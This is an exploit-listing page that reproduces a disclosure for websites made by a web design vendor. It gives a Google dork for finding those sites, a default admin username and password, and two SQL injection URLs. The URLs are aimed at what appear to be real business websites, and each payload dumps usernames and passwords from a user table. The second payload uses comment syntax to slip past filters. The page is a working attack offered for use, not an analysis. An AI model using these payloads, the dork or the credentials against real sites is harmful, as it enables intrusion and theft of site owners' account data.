Advertisement


Looking for a fix? Check your Codebase security with multiple scanners from Scanmycode.today


Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020080018

Below is a copy:

Opulent Solutions Design Default Admin Password
######################
Exploit Title : Opulent Solutions Design Default Admin Password
Exploit Author : Behrouz Mansoori
Vendor Homepage : https://dynamicxperts.com
Google Dork  : "Website Designed & Developed By Opulent Solutions."
Date: 2020-08-02
Tested On : Win 10 / Mozilla Firefox
######################
#
# username : admin
# password : opulent007
#
######################

# demo 1 :
http://www.hytechpaper.com/products.php?id=-3%27%20union%20select%201,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12%20from%20user--+

# demo 2 :
https://www.yorklasercentre.com/service.php?id=-2%20/*!50000union*/%20/*!50000select*/%201,2,/*!50000group_concat(username,0x3A,password)*/,4,5,6,7,8,9,10,11,12%20/*!50000from*/user--


######################

#Discovered by: Behrouz Mansoori
#Instagram: Behrouz_mansoori
#Email: [email protected]

######################

Copyright ©2020 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.